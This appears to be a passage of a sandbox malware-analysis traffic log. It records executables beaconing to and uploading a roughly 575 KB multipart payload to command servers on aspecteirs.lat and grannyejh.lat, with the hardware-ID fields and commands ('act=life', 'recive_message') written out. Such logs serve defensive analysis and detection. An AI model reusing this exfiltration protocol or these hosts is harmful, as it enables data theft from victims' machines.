                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC1236OUTData Raw: 2d 2d 35 4c 59 46 37 31 58 54 4a 33 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 35 4c 59 46 37 31 58 54 4a 33 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4c 59 46 37 31 58 54 4a 33 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 35 4c 59 46 37 31 58 54 4a 33 49 0d
                                                                                                                                                                                                                                                          Data Ascii: --5LYF71XTJ3IContent-Disposition: form-data; name="hwid"4D9AEFC7455232AC00D57F9DDD37BE0C--5LYF71XTJ3IContent-Disposition: form-data; name="pid"1--5LYF71XTJ3IContent-Disposition: form-data; name="lid"yau6Na--6989783370--5LYF71XTJ3I
                                                                                                                                                                                                                                                          2024-12-19 13:21:31 UTC1113INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:31 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=a3pqg7rkus7erl6k7h9g98ldte; expires=Mon, 14 Apr 2025 07:08:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHMzv1EYQHJBWNwcqoBM5QIl9XOMyaOiAViVtiBmKXYhvggSgnQQ3tseXmF3BuOpFp54Inn75VEI82xBaBT8XvrTXEmOmg6SU1ddz5urU9Axn2rv1Ev7rmUzPBbOdiN7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b238f8f5430d-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3202&min_rtt=1599&rtt_var=1719&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2143&delivery_rate=1826141&cwnd=227&unsent_bytes=0&cid=8330c5c224d3e542&ts=768&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:21:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          25192.168.2.449902104.21.66.854437112C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:32 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                          Host: aspecteirs.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:32 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                          2024-12-19 13:21:32 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:32 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=5jcgalj078eqdrc49bkhbbmrke; expires=Mon, 14 Apr 2025 07:08:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0SYV9KR8c3RQgBZWIAnWcy%2BhR4YYyYCtF6J1zEuffxM9HxqF1s60jM5Z%2Bec2YMajXct7AAqk8wV6jBIRH2OOwblCh3VInHKPb1%2B6KhTK2%2BV0rkzrTQ7srskbuOnxpvX9Vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b2408cc77291-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2359&min_rtt=2066&rtt_var=984&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1413359&cwnd=218&unsent_bytes=0&cid=67fe33572a9996ab&ts=797&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:32 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                          2024-12-19 13:21:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          26192.168.2.449907104.21.64.804435812C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=WDJUGMQ9BV
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 575690
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC15331OUTData Raw: 2d 2d 57 44 4a 55 47 4d 51 39 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 57 44 4a 55 47 4d 51 39 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 44 4a 55 47 4d 51 39 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 57 44 4a 55 47 4d 51 39 42 56 0d 0a 43 6f 6e
                                                                                                                                                                                                                                                          Data Ascii: --WDJUGMQ9BVContent-Disposition: form-data; name="hwid"4D9AEFC7455232AC00D57F9DDD37BE0C--WDJUGMQ9BVContent-Disposition: form-data; name="pid"1--WDJUGMQ9BVContent-Disposition: form-data; name="lid"yau6Na--6989783370--WDJUGMQ9BVCon
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC15331OUTData Raw: e1 bb a1 5f d0 da b6 78 17 e8 a6 0f 67 af ec e0 b9 a0 55 3c ca 59 88 12 69 52 75 7d e0 b1 1b a2 f8 3a ab cc 70 19 28 b2 6d fb f3 65 3b 14 79 16 d5 19 a7 4c b7 17 eb 49 d4 e2 75 ce 33 31 38 49 8b 6b fb ce 1c 95 71 7b ae a4 15 e3 0f fb 78 a3 ea 36 cd b2 70 aa 3f df a7 a4 a8 ed ac e6 2c 18 44 1e 8f b9 3b b3 af 45 1b c2 ce ad bd 52 83 ca 1a 7d 13 21 37 8c c4 02 3d 09 45 ef c8 08 af 50 00 84 f2 1b 13 b6 0b 3f 9a c4 3e f1 6d e7 3c 58 c8 ac 98 47 91 7d 90 ca 1a 1b 5c d4 38 a5 84 81 67 2f 29 b7 a8 63 11 55 c8 fa fa a8 f4 f3 ce 46 89 27 e7 ab 97 67 07 f0 0e 95 07 c7 18 ca f4 9a 43 4b ac 14 9a c5 88 63 3c 58 fa f8 d5 50 0e 2c 45 8d 09 9e b4 83 3d fe 85 fd fe bf a5 9a 1a 68 10 bb c5 47 3f 03 e8 12 98 f1 60 71 e0 39 0c 68 98 54 44 4b 65 91 16 84 d8 6b 6f 3c 8d e1 9a
                                                                                                                                                                                                                                                          Data Ascii: _xgU<YiRu}:p(me;yLIu318Ikq{x6p?,D;ER}!7=EP?>m<XG}\8g/)cUF'gCKc<XP,E=hG?`q9hTDKeko<
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC15331OUTData Raw: ec 64 3f 40 b5 19 30 3a 90 03 52 66 79 80 fa 84 34 da 4f d5 2c 33 91 6d 53 9a 4d fe ae c3 35 df 42 9e 9d 70 66 79 e5 36 47 f9 38 98 c6 20 65 be 38 52 71 ef ef 13 1f 8f a6 88 74 8a 7e db 38 7c 0f bc af 17 24 2d 0a 0a a6 5d 8e 09 7e 33 15 b5 94 b2 7c a5 8e 9c 0e b9 f2 1a 88 e0 85 e9 7d d7 1d aa ac 30 10 34 bd 5a ad b4 19 87 60 84 03 c2 f1 dc 38 fc c6 af 26 35 cd 0c 63 1d e9 fe 8b 5a ae b6 c1 f1 a3 d5 c5 ed f5 75 c6 61 8f 95 08 5f a0 fa 4f 20 fa 87 84 77 e9 3a 4b 02 da c7 e6 a5 28 8b 4e 42 1f 45 a2 2d 55 7c f1 6f ae 11 79 b6 bc 05 4a 71 97 7b 32 fd b1 1a 58 f0 f5 fe 13 58 75 ca 65 4d dc d0 76 36 a9 3a 20 af 62 21 22 76 10 2d a8 c7 58 a8 d9 09 67 be 77 34 9c cb c8 d0 fa 52 4f 2f f3 40 93 c9 35 d2 5e 55 df ec c3 3f 3f 5c 98 2b 6c bb fd 7a f6 71 48 0e ed 67 d4
                                                                                                                                                                                                                                                          Data Ascii: d?@0:Rfy4O,3mSM5Bpfy6G8 e8Rqt~8|$-]~3|}04Z`8&5cZua_O w:K(NBE-U|oyJq{2XXueMv6: b!"v-Xgw4RO/@5^U??\+lzqHg
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC15331OUTData Raw: 35 c5 35 5e 47 8e 69 62 1c a5 34 56 e3 0e 05 74 bc 00 e4 03 5b b2 0b 79 83 fe 73 26 e9 97 91 00 fb 52 9c 67 37 23 7a 7b 99 66 45 b3 15 05 2f d6 96 89 f3 41 ae ef ff 4c 7f 32 10 38 a8 56 38 22 57 38 2c fe f8 ae 28 8e db 7f 8d b6 e7 48 4e df 53 d7 dd 03 0a 7c 6f 4b f5 1b c4 f9 06 f6 92 3e 85 f2 cb 9c a0 59 c7 e7 16 f6 c6 6c b5 4b 5e bb 5d f7 fa 9d 65 d8 38 b1 d8 18 0a 7e 59 c1 18 ec af 3d b3 0a 91 bb 00 fd ce 3e 69 3d a5 7d 98 c1 a9 df 5c 61 a7 35 45 92 8e 04 c5 ae 6b 6e 8f 0c 70 41 ea 06 ec 40 04 58 ff e7 45 e5 61 04 15 75 ff a3 97 56 03 38 7e f1 d7 d9 f1 cb a1 c4 c2 f7 b8 5d 8f cf f9 0c 43 fd 81 2d 01 cc a6 bd 07 ab a5 80 db 45 7a 57 13 54 f4 83 68 56 81 23 f3 7f df 9d db 15 d0 d5 f4 1f e3 5b 30 d9 9b 29 2d d8 f4 ff 61 52 79 b4 4d 92 0a 5d fd f0 64 e8 2a
                                                                                                                                                                                                                                                          Data Ascii: 55^Gib4Vt[ys&Rg7#z{fE/AL28V8"W8,(HNS|oK>YlK^]e8~Y=>i=}\a5EknpA@XEauV8~]C-EzWThV#[0)-aRyM]d*
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC15331OUTData Raw: 87 ff cd b4 89 25 0a db 8a 05 e5 ec 43 31 3d 40 01 3e e7 07 ff 3e 72 13 9c e9 e8 cd 09 24 51 e6 c4 b6 12 7e 17 d8 75 19 b9 12 da fa 23 9d 74 a2 cf cf 51 f9 3a 7e 2c c1 98 77 3a 73 ab a9 84 e9 f1 c4 12 3b 33 d9 f4 35 ee df 61 fa f9 a5 d4 13 f4 84 79 d8 8d 91 03 bb 76 a1 2c 2f 3f c0 1e 89 fc 5f a4 0d 7b 48 8d 79 bb 9c e5 33 eb f3 73 6b 79 d9 fd d1 62 99 81 e0 dc 5f 4a 05 c0 3b f1 dd 9b 54 c0 21 cf da 45 7a 46 e4 fc 11 8f 57 39 2e 9b a2 77 90 74 36 83 b0 2b 5b 1d 36 18 1c 3a fe 4f 83 fe df 05 7e 6d 8f ef 68 bb 73 88 43 ff 9d b8 b3 05 c0 57 11 f6 0e 39 5d f7 a9 62 13 cf 7f 03 be d9 b6 7f 75 60 67 60 d7 f6 b0 14 44 7e 3b 76 95 ac dc b0 35 6c 3c c7 8d ba 7d 56 47 5e 96 a2 2d e6 e1 44 09 bb 9f 20 9b f1 e7 c2 f4 1a ef 37 9e c8 46 98 1d 2f 78 a9 d2 35 50 97 79 3d
                                                                                                                                                                                                                                                          Data Ascii: %C1=@>>r$Q~u#tQ:~,w:s;35ayv,/?_{Hy3skyb_J;T!EzFW9.wt6+[6:O~mhsCW9]bu`g`D~;v5l<}VG^-D 7F/x5Py=
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC15331OUTData Raw: a2 d6 d2 15 d1 0c 9b 08 16 19 30 ae 2a d1 fe 78 d2 e7 08 55 d4 93 c6 12 90 9b 5a 56 c1 cd a3 da 08 f7 42 d9 ec 07 ea 86 4e f7 53 7d ac 57 8e 7c 00 be 9f 0f 53 a7 f2 2a b7 d7 65 de 97 0c f3 97 45 cf c4 a1 9b 99 eb f6 75 ae 3a 20 61 f5 dd c8 08 74 b5 b1 d7 5e 0f 3d 7f ba 29 1a 64 a1 43 e6 75 ba e9 e6 77 a9 93 40 7d 0f d4 32 8b 28 db 09 80 e1 44 89 af 9f 96 de 9a 41 b6 16 33 b2 f1 72 d2 b6 93 7f d3 df b5 2f 32 01 35 fa 83 eb d9 c8 e7 d5 b8 79 5e b9 e0 6d 36 1e 23 7b 6b 36 27 7d 2d b5 d5 e3 33 2e f1 6b 41 81 e4 6c 3b 52 7d 48 2f a7 73 bf d5 3d 6a 30 7c 86 89 06 cd 25 9c 89 5f bb ea 5c 6f 4a ce 89 08 57 c9 a4 9e 57 89 21 07 8d 08 52 bf c0 a7 e7 ee 45 dc 14 db c0 b2 5b 7f 21 60 6d 2c 22 ab 08 8c ea 6f ea c9 35 eb f2 be 57 58 c6 07 9c 22 f7 44 05 5b ba c4 3a ee
                                                                                                                                                                                                                                                          Data Ascii: 0*xUZVBNS}W|S*eEu: at^=)dCuw@}2(DA3r/25y^m6#{k6'}-3.kAl;R}H/s=j0|%_\oJWW!RE[!`m,"o5WX"D[:
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC15331OUTData Raw: 80 83 ee ea f9 e0 e3 5a 34 be f6 a3 65 c3 64 e3 df 31 4a f8 cd bf fe 5d 99 e9 9b 64 6e 76 56 f2 36 f8 e3 e8 fd dc 51 de 9e 57 a1 cb 5c 41 10 7d 25 50 41 e5 84 2a f8 bc 48 75 40 6c b4 73 80 fd fd e8 d5 37 82 60 e6 2a 0e 30 6f f1 a2 dc cf 72 48 11 02 25 21 44 bd 8f 80 95 e4 c4 07 9f 9e be c3 3b dd db 29 36 d5 80 85 3b c3 fd 8e 03 ea d8 18 1a 96 4d 2f 06 c9 13 1a 78 af c6 79 73 4e 90 ed ca 95 18 95 6b af 2e 11 a5 d1 5f 7f 6d 94 bf f2 7b ff aa f1 47 cb 67 f4 ad de b0 75 23 0a 5f a8 80 f0 a1 e2 98 b8 a7 eb 4f a4 d7 35 c2 3f fc f5 f4 dd c4 7c b8 86 89 ee 3e 1e ac 26 26 f3 b0 b0 f5 a5 49 88 d5 ae 15 43 ff ad 71 57 39 a0 80 bb 19 98 f6 37 94 7d 0c 3b df 7f b0 ed 00 e0 fc 1e b1 f8 5f 0d a0 f4 60 eb 6c 82 00 e2 69 68 35 ad 39 0c 03 75 54 44 36 db 47 4d 83 71 68 eb
                                                                                                                                                                                                                                                          Data Ascii: Z4ed1J]dnvV6QW\A}%PA*Hu@ls7`*0orH%!D;)6;M/xysNk._m{Ggu#_O5?|>&&ICqW97};_`lih59uTD6GMqh
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC15331OUTData Raw: d1 a4 bf 99 c1 00 22 51 be d1 88 64 b0 62 8f 10 e7 7b de 99 66 47 88 42 da 12 34 80 b0 8b 77 50 54 26 1c 24 50 1e 02 1b 45 1a 06 f8 af e2 21 17 89 81 db 59 da 3b ce ee 30 cb ce 2c e7 48 80 db b4 dd ac ce 7d 39 ef 19 1f d6 c3 6f a5 2f 0c 7d 78 4d 9e de b0 8d c9 a4 da 8d 6d 76 62 ab 7f 5b ba d1 f7 6d 57 00 fc f7 ca 08 9a 0b cb 7c 00 94 1e c8 24 35 98 a4 fa de a9 21 54 10 76 90 9b 0b 6c 54 6a 75 b9 96 20 b9 66 89 b9 0b 8d 7e 3f 99 54 04 64 79 df ef 1f 65 ae 2c 8a 0d 03 26 58 21 20 6f fb 6d 42 6c 65 81 96 aa d2 3b 9b d6 4e d4 29 f1 ad 23 42 37 4e e3 12 ac 4c 14 c4 a0 46 fd b4 b0 7e 94 76 8e cf 90 04 e8 b8 55 60 c0 d2 00 67 f4 8e c5 36 a9 16 9a 58 04 e2 47 6a a6 f6 76 ac d3 c4 d0 cf 7a f2 cf e6 8a 63 85 20 7f e2 b8 70 df 22 4e 48 b0 d3 c7 3d 5c c9 ad 12 c3 65
                                                                                                                                                                                                                                                          Data Ascii: "Qdb{fGB4wPT&$PE!Y;0,H}9o/}xMmvb[mW|$5!TvlTju f~?Tdye,&X! omBle;N)#B7NLF~vU`g6XGjvzc p"NH=\e
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC15331OUTData Raw: c4 ba b3 01 17 8d 59 e7 ee a7 e9 05 a0 c8 15 f6 94 a4 cd ec df 27 aa 07 44 80 d5 01 d2 cc ff 39 ce 96 a4 80 cb c0 fe c2 43 3b ff f5 d7 d8 4e 14 df 94 a3 fb 78 a0 94 22 2f 0a eb bd d1 44 9e 95 be 78 85 d1 15 61 24 e3 38 c6 3d 14 b6 ae 4b 24 52 c8 7f 2b 7a 19 6f 59 1f b2 72 87 da ee 14 7c f9 1d 3d 2c 7e 24 4a a6 08 ce 69 31 d5 13 e5 b0 e9 27 cb f2 43 d4 bb 15 4a 91 43 2d 09 6f d5 75 5f fb af cb 3b 6f 13 01 1e c6 6f b7 26 27 73 bf 42 0c 75 f3 50 a0 f7 10 50 32 d3 aa 3b ab ca b5 30 d7 44 11 b6 f3 09 3b 09 ef 2e d2 01 ad 8a b4 d5 7c f3 f7 51 d3 76 d0 20 96 28 ba 97 44 27 2a b8 6d 6a b9 d5 42 83 9f d1 de aa 6b 36 e7 32 a5 a8 1f 23 a8 b7 ee 30 44 09 b8 9f db 13 31 a4 0b 30 e0 10 93 61 00 4f 01 59 50 58 2a 4f 3a 9c fc 1c 4a 5e 24 50 ba 22 bf f4 78 bf 98 64 b9 16
                                                                                                                                                                                                                                                          Data Ascii: Y'D9C;Nx"/Dxa$8=K$R+zoYr|=,~$Ji1'CJC-ou_;oo&'sBuPP2;0D;.|Qv (D'*mjBk62#0D10aOYPX*O:J^$P"xd
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC15331OUTData Raw: 1d 95 62 f5 3f 2c 3c 21 12 fa 09 62 5a 23 c0 a6 7d 31 1a 0f 77 81 b6 e2 60 29 96 56 a1 82 21 26 f4 c2 ca 3e 47 ba e5 f3 87 55 31 d2 0b 1d 74 78 05 0c cb 6d 01 29 b9 78 fc 0e c9 2d 32 9e e8 f6 1b a3 f7 b4 0a 7a 9c 43 f6 86 ac fd 4e 2a 34 53 0c 3e 50 11 fa ed ef 0c af 03 81 08 44 82 5d 6f be 96 a2 80 c5 37 d8 2e dd 85 4b d1 1b f8 54 fe 8f f4 ab 02 af ec 41 79 10 f8 c2 19 b0 6c 47 1c 2f f3 4c 01 b3 17 e3 d5 25 b9 19 80 03 7c bc 63 44 ea 15 6e 88 e2 e6 5a 70 84 cd ac b2 e4 3d c7 a2 2e 2d 21 24 bf b0 6a ff c8 48 da 3d 81 78 d5 b0 9e 36 91 9c af b4 5d 69 72 b1 c9 a4 d7 1a 28 3e 4c d8 f9 d5 2e 47 a9 aa fe 03 2a 24 5d 8c da f5 4f d9 07 0f f7 26 45 d0 fe 93 89 ac 90 06 39 e1 e3 af 23 de 20 c0 1e 54 ce 3d a3 2d 7c a0 99 02 d3 10 7a 2a 93 3c cf 55 b9 b5 94 08 19 09
                                                                                                                                                                                                                                                          Data Ascii: b?,<!bZ#}1w`)V!&>GU1txm)x-2zCN*4S>PD]o7.KTAylG/L%|cDnZp=.-!$jH=x6]ir(>L.G*$]O&E9# T=-|z*<U
                                                                                                                                                                                                                                                          2024-12-19 13:21:36 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:36 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=sfb5rv4gls14bm6t9t5abekoul; expires=Mon, 14 Apr 2025 07:08:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jy%2FgHCe7pDlqzfc5R46WH5WT%2FoaDuIFS04sD13GfN%2BCQFKQglYyibZpg%2FiqYECQUp5IrnbeVbmBcVaBONgmvH8N%2FQRkKC8Z6O5i1gp5w3MqGRJonNw0M6KeXnlAWYSuP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b24d7c5b1a44-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1897&min_rtt=1897&rtt_var=948&sent=339&recv=602&lost=0&retrans=1&sent_bytes=4200&recv_bytes=578248&delivery_rate=56315&cwnd=128&unsent_bytes=0&cid=d80e4c7422652997&ts=2577&x=0"


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          27192.168.2.449908104.21.66.854437112C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 50
                                                                                                                                                                                                                                                          Host: aspecteirs.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 26 6a 3d
                                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=CVmr0t--installs&j=
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:34 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=h6buuv036lj7p01eg1njoioe9c; expires=Mon, 14 Apr 2025 07:08:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQgvgsFKTpwlVjndmE7JcxV386HZ6lZUnWjxvHsdwQY3JsaQgxvD%2BwgEF0rec82aqS8cGG1mA6t0IJn0PiPIyeC8MS8mlONT4g9VozoQZFFBCQHum8sz56Kkc9vh4g4hwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b24e6ee58c1b-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1950&rtt_var=975&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4204&recv_bytes=948&delivery_rate=67710&cwnd=210&unsent_bytes=0&cid=61dc9d371468ff1d&ts=825&x=0"
